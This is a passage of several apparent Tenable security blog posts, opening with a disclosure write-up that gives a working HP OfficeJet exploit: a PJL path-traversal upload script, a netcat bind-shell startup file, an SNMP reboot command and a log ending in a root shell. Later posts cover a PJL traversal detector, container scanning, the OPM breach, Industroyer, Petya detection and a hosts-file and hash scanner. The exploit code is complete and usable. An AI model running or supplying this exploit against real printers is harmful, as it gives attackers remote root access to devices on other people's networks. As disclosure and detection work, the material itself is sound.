    cat /tmp/pwned | /bin/sh 2>&1 | /usr/bin/nc -l 1270 > /tmp/pwned &
fi

With that decided, our focus shifts to remotely rebooting the printer. One method would be using the Power Cycle function in the web interface (under the Tools menu). Another method is using the SNMP printer MIB to power cycle the device.

albinolobster@ubuntu:~$ snmpset -v1 -c public 192.168.1.158 1.3.6.1.2.1.43.5.1.1.3.1 i 4
iso.3.6.1.2.1.43.5.1.1.3.1 = INTEGER: 4

In the following script, I’ve combined writing the startup script to the profile.d directory and the SNMP reboot:

##
# Create a bind shell on an unpatched OfficeJet 8210
# Write a script to profile.d and reboot the device. When it comes
# back online then nc to port 1270.
#
# easysnmp instructions:
# sudo apt-get install libsnmp-dev
# pip install easysnmp
##

import socket
import sys
from easysnmp import snmp_set

profile_d_script = ('if [ ! -p /tmp/pwned ]; then\n'
                    '\tmkfifo /tmp/pwned\n'
                    '\tcat /tmp/pwned | /bin/sh 2>&1 | /usr/bin/nc -l 1270 > /tmp/pwned &\n'
                    'fi\n')

if len(sys.argv) != 3:
    print '\nUsage:upload.py [ip] [port]\n'
    sys.exit()

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2)
server_address = (sys.argv[1], int(sys.argv[2]))
print 'connecting to %s port %s' % server_address
sock.connect(server_address)

dir_query = '@PJL FSDOWNLOAD FORMAT:BINARY SIZE=' + str(len(profile_d_script)) + ' NAME="0:/../../rw/var/etc/profile.d/lol.sh"\r\n'
dir_query += profile_d_script
dir_query += '\x1b%-12345X'
sock.sendall(dir_query)
sock.close()

sock1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock1.connect(server_address)
dir_query = '@PJL FSQUERY NAME="0:/../../rw/var/etc/profile.d/lol.sh"\r\n'
sock1.sendall(dir_query)

response = ''
while True:
    data = sock1.recv(1)
    if '\n' == data: break
    response += data

print response
snmp_set('.1.3.6.1.2.1.43.5.1.1.3.1', 4, 'integer', hostname='192.168.1.158', community='public', version=1)
print 'Done! Try port 1270 in ~30 seconds'

You can run the script and, about thirty seconds later, have a root shell via port 1270.

albinolobster@ubuntu:~$ python printer_exploit.py 192.168.1.158 9100
connecting to 192.168.1.158 port 9100
@PJL FSQUERY NAME="0:/../../rw/var/etc/profile.d/lol.sh" TYPE=FILE SIZE=119
Done! Try port 1270 in ~30 seconds
albinolobster@ubuntu:~$ nc 192.168.1.158 1270
whoami
root

Tenable solutions

Fortunately for everyone, this little vulnerability is quite easy to detect once you understand the attack vector. Tenable released Nessus plugin 100461 in late May to detect this vulnerability. Also, changes were made so that Nessus no longer causes port 9100 to print during service discovery. Hopefully, that will encourage more customers to enable printer scanning.
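The same attack vector can also be spotted on the wire. The added Python example below (not Tenable’s plugin and not the author’s code) parses captured client-to-printer PJL lines from port 9100 and flags file-system commands whose NAME argument traverses out of a PJL volume; the capture lines are constructed to mirror the exchanges shown above.

```python
import re

# PJL commands that reach the printer's file systems (the four used in the write-up).
FS_COMMANDS = {"FSDIRLIST", "FSQUERY", "FSUPLOAD", "FSDOWNLOAD"}
# Universal Exit Language sequence (starts with ESC) that terminates a PJL job.
UEL = "\x1b%-12345X"

PJL_RE = re.compile(r"@PJL\s+(?P<cmd>[A-Z]+)(?P<rest>.*)")
NAME_RE = re.compile(r'NAME="(?P<name>[^"]*)"')


def parse_pjl(line):
    """Return (command, NAME value or None) for a PJL command line, else None."""
    m = PJL_RE.match(line.strip())
    if not m:
        return None
    name_m = NAME_RE.search(m.group("rest"))
    return m.group("cmd"), (name_m.group("name") if name_m else None)


def has_traversal(name):
    """True when any path component is '..'; catches both '../../x' and '0:/../../x'."""
    if not name:
        return False
    return ".." in re.split(r"[\\/]", name)


def scan_capture(lines):
    """Return one alert per file-system command whose NAME traverses out of a PJL volume.

    Writes (FSDOWNLOAD) are rated high because, as the write-up shows, a write into
    a startup-script directory leads to code execution; reads and listings are medium.
    """
    alerts = []
    for lineno, raw in enumerate(lines, 1):
        # A client may send the UEL on the same line as the command; split it off.
        for chunk in raw.split(UEL):
            parsed = parse_pjl(chunk)
            if parsed is None:
                continue
            cmd, name = parsed
            if cmd in FS_COMMANDS and has_traversal(name):
                alerts.append({
                    "line": lineno,
                    "command": cmd,
                    "path": name,
                    "severity": "high" if cmd == "FSDOWNLOAD" else "medium",
                })
    return alerts


# Constructed client->printer lines mirroring the exchanges in the write-up.
SAMPLE_CAPTURE = [
    '@PJL INFO STATUS',                                                  # benign
    '@PJL FSDIRLIST NAME="0:/" ENTRY=1 COUNT=1024',                      # benign: the real volume
    '@PJL FSDIRLIST NAME="../../bin/" ENTRY=1 COUNT=4',                  # enumerates the Linux root
    '@PJL FSUPLOAD FORMAT:BINARY NAME="../../etc/passwd" OFFSET=0 SIZE=648',
    '@PJL FSDOWNLOAD FORMAT:BINARY SIZE=4 NAME="0:/../../rw/var/etc/profile.d/writing_test"',
]

if __name__ == "__main__":
    for alert in scan_capture(SAMPLE_CAPTURE):
        print(alert)
```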

To summarize, don’t overlook printers in your threat model. A printer is a computer and it should be treated like one. Scan it. Update it. Monitor it. Who knows what might lurk within?

Are Your Containers At Risk?


Containers have transformed the way organizations are deploying applications and services within their environments. While containers are lightweight and more efficient alternatives to virtual machines, they usually exist for a short period of time. Rapid changes in agile environments can create significant risks for security teams using traditional vulnerability management solutions. Tenable.io™ Container Security provides you with an in-depth vulnerability assessment of container images, enabling you to evaluate the security of your containers before they are deployed.

Tenable.io Container Security

Containers and DevOps

Containers provide DevOps teams with an easy way to build and deploy applications into a production environment. Images are often pulled directly from public repositories that contain stripped down versions of base operating systems and web applications and services. Just like traditional applications and services, containers may be outdated and hold vulnerabilities that can leave your systems at risk.

Container and security teams

For security teams, attempting to assess the security of containers can present a host of challenges when the containers are deployed as needed or hidden behind the Docker virtual networks. Containers take advantage of the Linux OS kernel by sharing host OS resources, enabling quick delivery of applications that can be easily deployed, used, or removed within a short amount of time. Active scanning using credentials is often ineffective, as containers typically don’t include the SSH daemon needed to log in and scan the container. Some containers may have isolated applications and services that are not exposed publicly, making it difficult for security teams to assess an organization's overall risk profile.

Tenable.io Container Security

Using Tenable.io Container Security provides you with the visibility needed to see what’s going on inside your containers. Having accurate information enables developers to pinpoint and remediate container risks in a timely manner.

Getting started with Tenable.io Container Security is so easy that we are offering a free 60-day test drive.

Existing Tenable.io customers can activate their trial by logging into Tenable.io, and selecting Container Security from the Vulnerability Management toolbar.

Activate a Tenable.io Container Security trial

Within the splash screen, click on Try Container Security to enable your 60-day free trial.

Enable a 60-day free trial

Once your trial has been activated, you will be redirected to the Tenable.io Container Security main page.

Tenable.io Container Security main page

Pushing container images

You can easily push images to Tenable.io Container Security from any environment or platform within your network. To push images, start by logging in using your Tenable.io Container Security credentials from the host system.

$ docker login -u TENABLE_IO_CONTAINER_SECURITY_USERNAME -p TENABLE_IO_CONTAINER_SECURITY_PASSWORD registry.cloud.tenable.com

To get a complete list of your existing container images, enter the following:

$ docker images

Once you have identified the image you wish to upload, enter the associated Docker Image ID, Repository name, Container image, and Tag. Note that the tag is optional; the system will use “latest” within the tag field by default.

$ docker tag <imageID> registry.cloud.tenable.com/<repository>/<image>:<tag>

Once tagged, you can push the container image up to registry.cloud.tenable.com.

$ docker push registry.cloud.tenable.com/<repository>/<image>:<tag>

To close out of your session, use the docker logout command to remove login credentials from the host:

$ docker logout registry.cloud.tenable.com

Dashboards

Dashboards provide management with complete visibility into your overall container security. Results include the number of images, vulnerabilities and malware discovered, enabling you to quickly determine which containers are at risk.

Dashboard results

Repositories can be created manually or automatically pushed or pulled from an existing container registry. Tenable.io Container Security includes a repository index highlighting the number of images per repository, overall size, and the number of vulnerabilities or malware detected within that repository. You can easily drill down into any repository, image, or tag providing information on detected services, as well as vulnerabilities that may be present within the image.

Repository index

Scan results for each container image include when the image was last analyzed, the overall risk score, and results in HTML, JSON and Nessus v2 file formats.

Layers

Tenable.io Container Security inventories and analyzes each layer within the container registry for vulnerabilities and malware. Scan results include information on the overall risk score, distribution of vulnerabilities by CVSS score, and a list of vulnerabilities by CVE. Use this information to help narrow down and remediate vulnerabilities before systems are deployed to production.

Policies

Tenable.io Container Security supports rules-based policy enforcement that helps you filter scan results and highlight specific vulnerability data relevant to your organization. Policies can be applied globally or to specific repositories, and can highlight specific CVEs, CVSS values, or whether malware has been detected.

Policies

After adding rules that meet your organization's application security policies, you can organize the way rules are evaluated via drag and drop.

Scan results

Results include an overall risk score and information about the container image, including the base operating system (OS) and version. For teams that want to scan for changes between development and production environments, results also include a unique SHA256 checksum for each individual image pushed to Tenable.io Container Security. Using the Tenable.io Container Security Risk Scoring Framework, vulnerabilities are measured to help you determine the risk to your environment.

Container image scan results

Each container layer and associated checksum is included within the scan results, along with an inventory of packages within the container image. Results include detected CVE, CVSS base score, description of the vulnerability, and remediation details.

Scan results details

As container images are uploaded into Tenable.io Container Security, they are automatically scanned for vulnerabilities and malware. Once a vulnerability is identified, the product automatically rescans all stored container images against the new vulnerability, thus ensuring continuous protection.

For DevOps teams, Tenable.io Container Security provides integrations with common build systems such as Jenkins, Bamboo, Shippable, Travis CI and others, as well as with other continuous integration/continuous deployment tools used by software developers. This enables you to push images from your private registry into Tenable.io Container Security.

Learn more

Tenable is the only vulnerability management provider to offer integrated container security with Tenable.io Container Security.

Tenable.io Container Security integrates with continuous integration and continuous deployment (CI/CD) systems to support and strengthen DevOps practices, as well as enterprise policy compliance.

Want to know more about Tenable.io Container Security?

The OPM Breach Two Years Later: Four Best Practices for Cyber Operational Excellence


Socrates is alleged to have said, “the secret of change is to focus all of your energy, not on fighting the old, but on building the new.”1 The saying certainly applies to cybersecurity, where change is the only constant. You don’t have to be Socrates to see that two years after the Office of Personnel Management cyberattack, too many organizations are still focusing on the old and not building the new.

The good news here is that it’s not too late. There are some best practices that all organizations can employ to strive for operational excellence, to better understand and reduce their exposure and risk, and to implement a resilient, long-term cybersecurity strategy.

1. Manage risk proactively

When the OPM breach was discovered in 2015, the agency also found 15,000 outdated machines and 2,000 pieces of malware unrelated to the data breach. Fewer than 10 infections from the breach’s PlugX malware compromised millions of records. The agency was thrown into reacting to, not anticipating, a major incident.

Knowing your network is the foundation of good cybersecurity

Knowing your network is the foundation of good cybersecurity and your best defense against increasingly sophisticated cyberattacks. Having a resilient and comprehensive cybersecurity posture must start with a strong understanding of your organization’s network, nodes, assets, tools and vulnerabilities, accompanied by a robust patch management program to address known but unpatched vulnerabilities.

The insider threat also cannot be ignored. Insiders with legitimate access privileges often can fly under the security radar so that breaches are discovered only long after the fact. There are blind spots in every organization’s network that leave them vulnerable, including employee data which carries immense value to attackers. That’s why it’s important to treat all data—especially on government networks—as carefully as you would classified information, and implement effective access, password and credential management to defend against elevated privileges, unauthorized access and insider threats. You can never truly know where the next threat will come from.

2. Embrace modernization

Organizations cannot make large, impactful changes if they are averse to change in the first place, and this is true in IT security as in other areas of operation.

Security upgrades must go hand in hand with IT modernization

Security upgrades must go hand in hand with IT modernization. As organizations deploy up-to-date IT, they have the perfect opportunity to reduce their attack surface and address rapid changes in the threat landscape. They can enhance security through improved visibility into the network, continuous and comprehensive monitoring, and the patching of vulnerabilities. Legacy systems that are no longer supported with regular patches can be protected by isolating them from the internet-connected network until they can be replaced.

However, at some point, government agencies will run out of resources to maintain these outdated systems, and will need to prioritize change. One way to hold these organizations accountable to high security standards is to implement a baseline approach that outlines which models of operating systems can still be supported across the federal government, and then follow through with cyber funding to improve networks.

Legislation, such as the Modernizing Government Technology (MGT) bill now pending in the Senate, would establish a working capital fund to let agencies pay for technology updates through savings realized from modernization. Replacing the traditional use-it or lose-it approach of annual appropriations would allow agencies to make long-term plans for replacing legacy IT, taking advantage of advances in technology while simultaneously strengthening cybersecurity.

3. Leverage cybersecurity frameworks

Too often, organizations reinvent the wheel when it comes to cybersecurity. This is particularly the case from a governance or process perspective. Yet there is a large volume of cybersecurity research available that has identified many cybersecurity best practices.

The government has produced several cybersecurity frameworks to help agencies and other organizations secure IT systems and sensitive data. Many of these are voluntary for the private sector, but under FISMA (Federal Information Security Modernization Act) and other cybersecurity initiatives, federal agencies are being required to use this guidance. The NIST Cybersecurity Framework is now recommended by the recent Presidential Executive Order on Cybersecurity as a starting point on long-term foundational cybersecurity insights.

4. Invest in a strong workforce

Finally, regardless of the threats facing all organizations, it takes well-trained, well-informed people with creative mindsets to stop the threats. In government, as in other sectors such as oil, gas and utilities, many of the best-trained workers are nearing retirement. This brain drain will make combatting threats even more difficult.

By September 2017, 31 percent of the federal workforce will be eligible to retire

A GAO study found that by September 2017, nearly 600,000 federal workers—31 percent of the workforce—will be eligible to retire. Government agencies will find it difficult to compete with the private sector to counter the exodus. Government salaries usually are not competitive with commercial firms, and private sector jobs often offer more flexibility and creative benefits.

Organizations will have to provide incentives outside of financial compensation for security professionals to enter and remain in the cybersecurity workforce. Benefits such as flexible working conditions, professional development, and public service opportunities should be offered to a younger workforce that values such creative benefit packages.

More information

Build a solid foundation for a long-term cybersecurity strategy

Effective cybersecurity requires that organizations learn from the OPM breach and build a solid foundation for a long-term cybersecurity strategy. By focusing first on basic practices, organizations can make strides in understanding their exposure, reducing risk and building a resilient cybersecurity program.

For more details on these best practices, download our free OPM whitepaper.

1 The quote is attributed to a character named Socrates in Dan Millman’s book Way of the Peaceful Warrior.


Securing Industrial Control Systems Against Vulnerabilities and Malware


Recently, a new threat dubbed Industroyer or CrashOverride was identified as the malware that was used in the 2016 attack on the Ukraine electric grid. Many pros are calling Industroyer the biggest threat to hit industrial control systems (ICS) since Stuxnet. However, Industroyer’s significance as a single event is relatively small because there are no zero days in the Industroyer payload.

Malware like Industroyer is the new normal

Security for critical infrastructure is a matter of national security and unfortunately, malware like Industroyer is the new normal. Multiple smaller attacks could easily add up to a disruptive event. Instead of reacting to every new malware threat, administrators should take a long-term strategic approach to this new environment.

Complying with a good security framework is one of the most effective security strategies you can adopt instead of just reacting to newsworthy vulnerabilities

ICS/SCADA systems often cannot be scanned or patched due to uptime requirements or simply because legacy systems have no means of being updated. So, when Industroyer was announced, the North American Electric Reliability Corporation (NERC) issued an alert to their members to be vigilant and to protect their networks with tighter access controls. They recommend their NERC Critical Infrastructure Protection Standards as best practice requirements for utilities to secure their assets. Complying with a good security framework takes time, but it is one of the most effective security strategies you can adopt instead of just reacting to newsworthy vulnerabilities.

How Industroyer works

Industroyer employs a modular design, and can be broken down into four basic components:

  • Backdoor - sets up a command and control channel over https once the system is infected
  • Launcher - launches one or more payloads
  • Four payloads - one payload for each SCADA protocol that Industroyer supports:
    • IEC 60870-5-104
    • IEC 60870-5-101
    • IEC 61850
    • OLE for Process Control Data Access (OPC)
  • Data wiper - a component that wipes itself from the system

There is an additional backdoor which could be installed to maintain persistent control over the system by replacing a legitimate version of Notepad with a trojanized version of Notepad.

The malware authors also released a tool which performs a DoS attack against the Siemens SIPROTEC family of protection relays.

Tenable solutions that detect SCADA protocols

Tenable offers several solutions to detect the ICS/SCADA protocols targeted by Industroyer and other malware.

Nessus

YARA signatures are available to detect one or more of the Industroyer/CrashOverride payload components. Tenable customers can use YARA rules to identify infected systems with the Malicious File Detection Using Yara Nessus® plugin.

You’ll find sample rules that can be used with Nessus to detect the IOCs on GitHub.

Nessus Network Monitor

Nessus® Network Monitor (formerly PVS™) has released signatures to detect a DoS attack on the Siemens SIPROTEC family of protection relays (SIPROTEC DoS, CSA-15-202-01/ CVE-2015-5374): PRM #700132, Siemens SIPROTEC DoS (SCADA).

Using SecurityCenter dashboards for strategic protection

Using the Nessus vulnerability scanner and Nessus Network Monitor, SecurityCenter Continuous View® (CV) has the ability to correlate collected data and provide insight into the discovered risks. SecurityCenter® can help administrators focus in on a new critical vulnerability (such as Industroyer/CrashOverride) when it is detected in their networks. But ICS/SCADA systems require more than a periodic scan for the latest vulnerability; a complete discovery inventory, passive and active monitoring, and credentialed scans should be included as best practices. In the NERC Critical Infrastructure Protection Standards, the first strategic steps are to inventory the systems on the network, and ensure all protocols in use on the networks are properly identified. The CIP-002 BES Cyber System Categorization dashboard assists with host discovery and vulnerability identification, helping you get a broader picture of your network security.

CIP-002 BES Cyber System Categorization dashboard

CIP-002 requires organizations to identify and categorize Bulk Electric System (BES) Cyber Systems to support appropriate protection against compromises that could lead to misoperation or instability in the BES. You can meet this requirement by building and maintaining an accurate inventory of devices so that any attack or infection can be effectively detected and isolated. Additionally, once you know what devices are part of your NERC environment, you will be prepared to address CIP-007 R1 by monitoring network traffic to detect ports or services that should not be in use.

CIP-007 R1 requires organizations to protect against the use of unnecessary physical input/output ports used for network connectivity, console commands, or removable media. If unauthorized traffic is detected, the accurate inventory you built will be key in identifying and addressing the devices involved. The CIP-007 R1 Ports and Services dashboard provides thorough insight into the network activity in your organization by monitoring open ports and active services. The dashboard also identifies the usage of SCADA-specific protocols as well as protocols from SCADA vendors. Since targeted malware, like Industroyer/CrashOverride, can exploit SCADA protocols to compromise BES systems, understanding the expected and acceptable traffic within your NERC environment is essential. The network activity detections are performed by the Tenable Nessus Network Monitor, and other network traffic collected by the Tenable Log Correlation Engine® (LCE®) is normalized and correlated to identify traffic patterns and anomalies. Active scan data from SecurityCenter is used in this dashboard to detect vulnerable ports and exploitable services. All of the data helps you resolve misused or misconfigured ports and services to protect your network against malicious activity.

There are six other dashboards related to CIP available in the SecurityCenter Feed.

These dashboards can help you monitor a variety of other network security concerns, such as access control and change management. Other dashboards monitor for vulnerabilities and malware in your NERC environment. You can also track transient devices and monitor your network perimeter with CIP dashboards, giving you a complete view of network access and usage. This set of dashboards leverages active and agent scan data gathered by Nessus, along with passive network detections by the Nessus Network Monitor and correlated event data from LCE. Armed with all of this information about your NERC environment, you will be prepared to remediate issues and maintain CIP compliance. Determining whether your environment is vulnerable to malware in the news that day is important, but a strategic and thorough approach aided by SecurityCenter CV prepares you to ensure the security of your network when the hype fades.

Wrap-up

The key to managing a great security program is being strategic rather than tactical

Don’t fall into the trap of chasing down the latest headline-making vulnerability on your SCADA systems. A unified platform like SecurityCenter provides a more strategic approach to securing industrial systems and critical infrastructure with active and passive monitoring of your systems. If your AV systems, patching programs, and signatures are kept up to date on a regular basis; if you run credentialed scans for misconfigurations; if you implement protocols to assure that only the appropriate devices are communicating with each other; if you audit CIP compliance, then the next malware crisis will not be a major threat to your environment. The key to managing a great security program is being strategic rather than tactical.

 

Many thanks to Megan Daudelin, Ian Parker and John Chirhart for their contributions to this blog.

Petya/NotPetya Ransomware Detection for the Modern Enterprise


A new version of the Petya malware is spreading globally, including the European Union, Ukraine and Russia. It has already impacted many organizations, both large and small, and has compromised systems at Ukraine’s central bank, its state telecommunications company, municipal metro, and Kiev’s Boryspil International Airport.

Background

Petya ransomware is powered by Shadow Brokers exploits, which were leaked earlier this year. After compromising a system, the malware encrypts the data using a private key, and prevents users from accessing the system until it is restored or decrypted. The initial infection vector for this campaign appears to be a poisoned update for the MeDoc software suite, a tax software package used by many Ukrainian organizations. The malware then infects systems that are vulnerable to MS17-010 and spreads laterally across the infrastructure.

Note: The Petya malware creates a scheduled task which reboots up to one hour after infection. If the task is removed before execution, it does not reschedule, buying you some time.

Similar to the WannaCry ransomware that infected systems globally earlier this year, Petya takes advantage of known vulnerabilities that already have patches. In a world where malware threats arise every day, chasing daily threats is not advised. Organizations everywhere and of every size need a more strategic approach to proactively manage security threats (and protect themselves and their customers) by implementing good cyber hygiene practices, including regular patching, updates, backups, and continuous monitoring.

How Tenable can help

Patch vulnerabilities

Tenable customers should immediately patch systems vulnerable to MS17-010 if they haven’t already done so. Tenable.io™ Vulnerability Management has the following four plugins, released earlier this year, to detect vulnerable systems:

Plugin ID | Plugin Title/Comments | Exploits
--------- | --------------------- | --------
97737 | MS17-010: Security Update for Microsoft Windows SMB Server (4013389) | ETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, ETERNALSYNERGY, WannaCry, EternalRocks
97833 | MS17-010: Security Update for Microsoft Windows SMB Server (4013389) uncredentialed check | ETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, ETERNALSYNERGY, WannaCry, EternalRocks

Malware scan

Tenable customers can use the Malware Scan Policy in Tenable.io™ or SecurityCenter™ to detect machines infected with Petya, and the results will be reported under plugin 59275:

Plugin 59275 output

YARA detection

Tenable customers can also use YARA rules to identify infected systems through the Malicious File Detection Using YARA Nessus plugin.

Here’s a sample rule from Kaspersky which can be used with Nessus to detect the Petya malware:

Sample YARA rule for Nessus to detect Petya

Dashboards

The Petya dashboard uses all the available methods mentioned above to consolidate the data for easy understanding of the systems most likely affected or at risk from the malware. The components bring in netstats from Nessus and the Nessus Network Monitor, and also display the content related to missing patches associated with SMB vulnerabilities.

Wrap-up

Most ransomware exploits well-known vulnerabilities that already have patches available. Implementing a proactive security program that includes regular patching and system updating is one of the best strategies you can use to prevent malware from infecting your systems. Make it a regular habit to patch and protect.

For more information

  • Learn more about Tenable.io, the first vulnerability management platform for all modern assets
  • Get a free 60-day trial of Tenable.io

Many thanks to the Tenable research team for their contributions to this blog.

Updated June 28, 2017. Initial research suggested that CVE-2017-0199 was a potential infection vector; we are doing additional research into that issue.

Staying Ahead of the Curve

Tenable.io Malicious Code Prevention Report

As malware attacks continue to make headlines, many organizations struggle to stay ahead of the complex, evolving threat landscape. Attackers use both old and new ways to deliver malware through exploiting existing vulnerabilities, evading security solutions, and using social engineering to deliver malicious payloads. Millions of unique pieces of malware are discovered every year, and even with the best security controls in place, monitoring the thousands of endpoints within your network for malware can be nearly impossible.

Use Tenable.io to quickly address systems that are at risk

Once inside your network, malware can disable security controls, gain access to privileged accounts, replicate to other systems, or maintain persistence for long periods of time. If these risks are not addressed quickly, they can result in long term, devastating consequences for any organization. Using the Malicious Code Prevention Report from Tenable.io™ provides you with the visibility needed to quickly address systems that are at risk.

Malicious Code Prevention Report

Malware scanning

Tenable.io includes a customizable malware scan template where you can incorporate both known-good and known-bad MD5 hashes, along with a hosts file whitelist. On Windows systems, the hosts file normally contains only comment lines and two localhost address entries. Most systems query local DNS servers to resolve domain names to IP addresses. Some organizations add entries to the hosts file for dedicated systems within their environment or to block unauthorized websites. Once a hosts file is modified, the local system uses the entries within the hosts file first and bypasses records held by your DNS server.

Malware also targets the hosts file to insert redirects to malicious sites or block security solutions from obtaining patches and security updates. For organizations utilizing the hosts file, the Malware Scan template provides you with the ability to add whitelist entries that would otherwise be flagged as abnormal by existing security solutions within your environment.

Malware Scan template

Enabling the File System Scanning option enables you to scan specific directories within your Windows environment, such as C:\Windows, C:\Program Files, and the User Profile directories, that are frequently used to install malware. You can also scan for malware within directories such as C:\ProgramData that are hidden by default on Windows systems.

Scanning files

Organizations can have any number of mapped drives and devices connected to a system. Most anti-virus solutions only scan default directories such as the C:\ drive, and without additional rules in place, malware could easily bypass this security control via flash drive or external USB drive.


The Malware Scan template provides an additional layer of security to scan network drives and attached devices that may not be targeted by your anti-virus solution. Using the Custom File Directories option, you can include a list of directories within your scan to target mapped drives and attached devices.

YARA rules can also be incorporated into your Tenable.io malware scan. Using a combination of regular expressions, text strings, and other values, YARA examines systems for specific files that match the values within the rules file.
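As an added example (not Tenable's code, and not how the Malware Scan template itself is implemented), the following Python script mirrors the two checks described in the hosts file and File System Scanning paragraphs above: it reviews a Windows hosts file against a whitelist and compares files in chosen directories against known-good and known-bad MD5 lists. The sample hosts file, whitelist and directory tree are constructed for the demo.

```python
"""Added example: a minimal hosts-file audit and hash-list directory scan.
All sample data in this file is constructed; nothing here is real malware."""
import hashlib
import os
import tempfile

# Entries a default Windows hosts file maps; everything else gets reviewed.
DEFAULT_ENTRIES = {("127.0.0.1", "localhost"), ("::1", "localhost")}


def parse_hosts(text):
    """Yield (ip, hostname) pairs from hosts-file text, ignoring comments and
    blank lines. One line may map several names to the same address."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        for name in fields[1:]:
            yield fields[0], name.lower()


def audit_hosts(text, whitelist):
    """Return hosts entries that are neither Windows defaults nor whitelisted.
    Malware commonly adds such entries to redirect traffic or to black-hole
    update and security-vendor domains, so anything unexpected is reported."""
    allowed = DEFAULT_ENTRIES | {(ip, name.lower()) for ip, name in whitelist}
    return [(ip, name) for ip, name in parse_hosts(text) if (ip, name) not in allowed]


def md5_file(path, chunk_size=65536):
    """Hash a file in chunks so large binaries need not fit in memory.
    MD5 is used only because the template's lists are MD5-based."""
    digest = hashlib.md5()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def scan_directories(directories, bad_hashes, good_hashes=frozenset()):
    """Walk the given directories (e.g. mapped drives or C:\\ProgramData) and
    return (path, md5) for every file whose hash is on the known-bad list.
    Known-good hashes are skipped first; unreadable files are ignored."""
    hits = []
    for directory in directories:
        for root, _dirs, files in os.walk(directory):
            for name in files:
                path = os.path.join(root, name)
                try:
                    digest = md5_file(path)
                except OSError:
                    continue
                if digest in good_hashes:
                    continue
                if digest in bad_hashes:
                    hits.append((path, digest))
    return hits


def build_sample_tree():
    """Create a constructed directory tree for the stand-alone demo: one benign
    file and one file standing in for a known-bad binary in a hidden folder.
    Returns (root_directory, md5_of_the_bad_file)."""
    root = tempfile.mkdtemp(prefix="malscan_demo_")
    os.makedirs(os.path.join(root, "ProgramData", "hidden"))
    with open(os.path.join(root, "readme.txt"), "wb") as handle:
        handle.write(b"constructed benign file\n")
    payload = b"constructed sample standing in for a known-bad binary\n"
    with open(os.path.join(root, "ProgramData", "hidden", "svc.exe"), "wb") as handle:
        handle.write(payload)
    return root, hashlib.md5(payload).hexdigest()


# Constructed sample hosts file: the defaults, one entry approved by IT, and
# two entries of the kind malware inserts (update blocking, site redirect).
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
10.0.5.20       intranet.example.internal   # approved by IT
127.0.0.1       update.av-vendor.example    # blocks AV updates
198.51.100.9    login.bank.example          # redirect to attacker-chosen host
"""
SAMPLE_WHITELIST = [("10.0.5.20", "intranet.example.internal")]

if __name__ == "__main__":
    for ip, name in audit_hosts(SAMPLE_HOSTS, SAMPLE_WHITELIST):
        print(f"abnormal hosts entry: {ip} -> {name}")
    root, bad_md5 = build_sample_tree()
    for path, digest in scan_directories([root], {bad_md5}):
        print(f"known-bad hash {digest} at {path}")
```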

Vulnerabilities

The Malicious Code Prevention report provides a comprehensive overview of, among other things, systems infected with malicious backdoors, hosts communicating with botnets, and vulnerabilities that can be exploited by malware.

Along with malware and malicious processes, this report also highlights systems with vulnerabilities that are exploitable by malware. Exploitable vulnerabilities can provide attackers with a backdoor into your network to enable privilege escalation or launch malicious code.

Hosts with vulnerabilities that are exploitable by malware


Tenable.io uses both active and passive methods to detect malicious content, including web traffic analysis, md5sum matching, public malware databases, and links pointing to known malware operators. Web servers hosting malicious content are also included within this report. Malicious code can be injected into a website through a cross-site scripting (XSS) or SQL injection vulnerability.

Attackers often target websites to deliver malicious payloads to a larger audience through message boards or blog posts. Malicious code often remains hidden within iframes, JavaScript code, and other embedded tags that link to third-party websites. This data can help you target and remediate issues on web servers before critical assets or services are impacted.

Botnets often use the HTTP protocol as well as encryption to evade detection by modern security solutions. Information reported by Nessus® and Nessus Network Monitor highlights active inbound and outbound communications with command and control (C&C) servers.

Hosts interacting with known botnets

Keeping your anti-virus clients updated helps to ensure your systems remain protected from malware. This report provides valuable information on the status of your anti-virus and anti-malware solutions, ensuring that they are installed and up to date. The Malware Protection chapter provides a summary of hosts running up-to-date anti-virus clients per operating system.

Anti-virus status

Tenable.io will analyze hosts with outdated anti-virus clients and provide targeted information you can use to remediate issues with anti-virus clients. Data is collected from Nessus that checks the status of various anti-virus clients across Windows, Linux, and Unix-based platforms. Using this information can also help you determine if your anti-virus client has been disabled.

Outdated anti-virus details


No organization is immune from vulnerabilities and attacks. Knowing how systems are compromised can help target response efforts and minimize future damage. Tenable.io provides you with critical insight needed to measure the effectiveness of your security program, and to gain insight into your current risk posture. Using the Malicious Code Prevention report by Tenable.io provides you with targeted information to prioritize remediation efforts, close malicious entry points, and stay one step ahead of attackers and other persistent threats.

Start with Tenable.io

To learn more about Tenable.io, visit the Tenable.io area of our website. You can also sign up for a free trial of Tenable.io Vulnerability Management.

Master Your Security Foundation: Control the Use of Administrative Privileges


What did the Sony and Anthem breaches have in common with an estimated 60-80% of all breaches? They all involve the use of compromised privileged (administrative) accounts.

Attackers using administrative credentials can move laterally across your network to conduct internal reconnaissance, maintain a presence, and ultimately accomplish their missions. Last year, The Forrester Wave™: Privileged Identity Management, Q3 2016 estimated that 80% of security breaches involve privileged credentials. It stated, “Privileged credentials provide greater scope for stealing data en masse than individual accounts do: With privileged credentials, attackers can dump the entire database, bypass network traffic limitation, delete logs to hide their activity, and exfiltrate data easier.”

The Cybersecurity Frameworks and Foundational Security Controls survey, sponsored by Tenable and the Center for Internet Security, uncovered a significant gap between organizations’ policies to control use of administrative privileges and the implementation of controls needed to enforce those policies. For example, 67% of respondents said they have implemented policies to change all default passwords for applications, operating systems, routers, firewalls, wireless access points and other systems. However, fewer than 45% have implemented automated or even manual controls to enforce their policies.

Let that sink in. One third of organizations do not have policies to change default administrative passwords. And even when policies exist, they are not widely enforced. Clearly, many organizations need to up their game.

Human nature being what it is, we are prone to take shortcuts and share administrative credentials across systems and across multiple administrators, as well as grant administrative privileges to users so they can install software themselves without troubling IT.

True story: I once worked with a small company that used the same shared administrative credentials across all of their enterprise applications. To make matters worse, the credentials were written down and kept on the lead administrator’s desk. If a disgruntled insider or an outside attacker got hold of credentials, he could anonymously access everything. Perhaps this is why the Center for Internet Security included “Controlled Use of Administrative Privileges” in the top five Foundational Cyber Hygiene Controls.

Tenable can help

